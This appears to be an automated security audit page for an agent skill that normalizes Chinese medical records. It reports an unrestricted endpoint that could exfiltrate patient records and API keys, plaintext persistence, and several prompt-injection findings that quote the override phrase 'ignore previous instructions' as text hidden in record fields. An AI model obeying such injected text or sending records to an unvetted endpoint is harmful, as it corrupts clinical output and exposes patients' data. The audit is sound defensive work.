Back to skill

Security audit

unisound-medical-term-normalization

Security checks for vulnerabilities and agentic risk

Overview

The skill’s medical-record normalization purpose is clear, but it can send sensitive records and an API key to any configured endpoint and can leave plaintext medical data on disk despite privacy wording that suggests otherwise.

Review before installing. Use only with de-identified records, avoid --base unless it is an approved HTTPS endpoint with a separate credential, and treat --save-prepared, --output, stdout, backups, and logs as containing sensitive medical data. This does not show clear malicious intent, but it needs tighter controls for regulated or production medical workflows.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (2)

T09 · Insecure Skill Coding Practices

Error
Location
scripts/run.py:200
Finding

Unrestricted LLM Endpoint Can Receive Medical Records and Bearer Credentials

Content
View full analysis
str: url = f"{base.rstrip('/')}/chat/completions" headers = {"Authorization": f"Bearer {appkey}"} if appkey else {} payload = { "model": model, "messages": [{"role": "user", "content": prompt}], "temperature": 0, } response = _http_post(url, payload, headers, timeout=timeout) ``` The destination is supplied through an unrestricted command-line option: ```python parser.add_argument("--base", default=DEFAULT_LLM_BASE, help=f"Internal LLM base URL (default: {DEFAULT_LLM_BASE}).") ``` ### Technical Analysis The `--base` argument controls the destination of the LLM request without any scheme or host validation. `call_llm()` then sends both the complete medical-record prompt and the operator-provided API key to that destination. The implementation does not: - Require HTTPS. - Restrict the hostname to the intended medical-model service. - Prevent credentials from being sent to a custom endpoint. - Reject loopback, link-local, or private-network destinations. - Verify the final host following HTTP redirects. Consequently, a malicious or mistakenly configured endpoint can collect the bearer credential and all clinical information included in the prompt. Allowing local or private-network URLs also gives the script an SSRF-like network access capability, although response handling and the fixed POST path limit how that capability can be used. ### Attack Path 1. An attacker convinces an operator, automation wrapper, or deployment configuration to invoke the skill with a malicious base URL, for example: ```bash python scripts/run.py \ --input patient-record.json \ ...[truncated 1301 chars]
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/run.py:171
Finding

Sensitive Medical Records Can Be Persisted as Unprotected Plaintext

Content
View full analysis
None: save_dir = Path(output_path).parent if output_path else SCRIPT_DIR.parents[1] / "runs" / "medical-term-normalization" save_dir.mkdir(parents=True, exist_ok=True) prepared_path = save_dir / f"{input_path.stem}.prepared.txt" prepared_path.write_text(payload_to_prepared_text(payload), encoding="utf-8") print(f"Prepared text saved to: {prepared_path}", file=sys.stderr) ``` Generated medical records can also be persisted as plaintext: ```python output_path = args.output or args.output_json if output_path: out_path = Path(output_path) out_path.parent.mkdir(parents=True, exist_ok=True) out_path.write_text(response, encoding="utf-8") print(response) ``` The documentation states that input and intermediate results are not persisted and are destroyed after each invocation, but the `--save-prepared`, `--output`, and `--output-json` options permit such persistence. ### Technical Analysis The script writes raw prepared input and generated clinical output through `Path.write_text()` without applying explicit restrictive permissions, encryption, retention controls, or secure deletion. The effective file permissions depend on the process umask and the security of the selected directory. The prepared input is particularly sensitive because it may contain the original, insufficiently de-identified medical record. Generated output may retain the same identifiers and clinical facts. This behavior is exposed through documented options, but the unconditional no-persistence privacy claim can lead operators to assume t ...[truncated 1694 chars]
Remediation
View remediation
Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (10)

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
94% confidence
Finding

The skill documentation describes capabilities to read multiple local file formats, optionally write output and prepared text to disk, and send medical record content to a remote model API, but it does not declare any explicit tool scope or permissions boundary. In a medical-data workflow, this omission is dangerous because it leaves sensitive file access, persistence, and network exfiltration insufficiently constrained, increasing the chance that PHI is accessed or transmitted beyond intended limits.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
94% confidence
Finding

The natural-language instructions, usage guidance, and safety notes are presented only in Chinese. This imposes a specific language on users without documenting a user choice, which matches the language/locale policy violation criteria.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The prompt text is entirely prescriptive in Chinese and instructs the model to act as a medical record normalization expert using Chinese clinical writing conventions, with no indication that language choice is optional. This constitutes a language/locale policy issue because it enforces a specific language and documentation style without user opt-in.

Content

No source excerpt is available for this finding.

Intent-Code Divergence

Medium
Category
Not specified by scanner
Confidence
96% confidence
Finding

The file header states that LLM calls use the company's internal medical model, but the CLI permits callers to override the base URL to any endpoint. This mismatch can mislead operators into believing data stays within an internal boundary when in fact it may be sent externally, increasing the risk of accidental PHI disclosure.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

The natural-language instructions and declared purpose are entirely in Chinese and the prompt construction forces Chinese-language normalization behavior. There is no indication that users can choose another language or explicitly opt into this locale constraint, which can violate language/locale policy requirements.

Content

No source excerpt is available for this finding.

Ssd 1

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

If the input JSON contains a prompt field, the script forwards it directly as the full LLM prompt, bypassing the medical-normalization guardrails entirely. This enables arbitrary instruction injection, causing the skill to perform unintended tasks, mishandle sensitive data, or defeat downstream assumptions about output scope and format.

Content

No source excerpt is available for this finding.

Ssd 1

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

Structured records are flattened into ordinary prompt text, so section/content fields can carry embedded jailbreak or override instructions that the model may follow. Because this skill processes medical records, compromised output integrity can corrupt clinical normalization results and potentially introduce unsafe or misleading documentation.

Content

No source excerpt is available for this finding.

Ssd 1

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The extracted medical text is interpolated directly into the instruction prompt as plain text, so adversarial content inside the record can include phrases like 'ignore previous instructions' or request data-transforming behavior outside the intended task. In an LLM pipeline, this semantic prompt injection can alter output integrity and cause unsafe or policy-violating responses.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
96% confidence
Finding

The code transmits the constructed prompt, which may contain entire medical records, to a remote API without any user-facing warning at the network call path. Because the data is medical and potentially regulated, silent transmission materially raises privacy, compliance, and data-governance risk.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
98% confidence
Finding

The script exposes a user-controlled --base parameter and then sends full medical-record content to that endpoint via call_llm/_http_post. In a medical-record normalization skill, this can exfiltrate highly sensitive PHI to any external service while the skill metadata and defaults imply use of an internal medical LLM only.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.